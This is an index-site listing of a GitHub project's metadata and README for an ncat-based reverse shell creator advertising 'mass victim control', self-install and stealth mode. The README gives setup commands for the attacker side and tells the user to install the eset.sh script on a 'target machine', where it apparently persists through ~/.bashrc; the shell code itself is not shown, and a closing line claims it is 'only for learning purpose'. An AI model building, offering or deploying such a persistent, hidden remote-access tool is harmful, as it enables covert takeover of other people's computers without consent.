Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/rohitaryal/-
Simple ncat based reverse shell 💀 creator with mass victim control
https://github.com/rohitaryal/-
Last synced: about 1 month ago
JSON representation
Simple ncat based reverse shell 💀 creator with mass victim control
- Host: GitHub
- URL: https://github.com/rohitaryal/-
- Owner: rohitaryal
- License: gpl-3.0
- Created: 2024-07-20T16:10:07.000Z (6 months ago)
- Default Branch: main
- Last Pushed: 2024-07-29T18:20:02.000Z (5 months ago)
- Last Synced: 2024-07-30T00:22:55.405Z (5 months ago)
- Language: Shell
- Homepage:
- Size: 30.3 KB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
Simple and very basic ncat based reverse shell creator with mass victim control (not exactly)
### Features include
- Reverse shell
- Self install
- Stealth mode### Usage
```bash
git clone https://github.com/rohitaryal/-.git
cd -/
chmod +x ip_util.sh
./ip_util.sh $(hostname -I)
```Remember not to run `eset.sh` on your personal PC although it can be easily removed.
Now install the `eset.sh` in your target machine and make sure you have replaced `URL` in `eset.sh` at line `25` with your repo URL
```bash
./eset.sh # Will do stuff itself
```### Removal
```
rm -rf ~/.config/eset
```And remove all entries of `~/.config/eset/eset.sh` from your `~/.bashrc`
### TODO
- Add support for `zsh`
- Add simple nodejs server
---
[!] Only for learning purpose.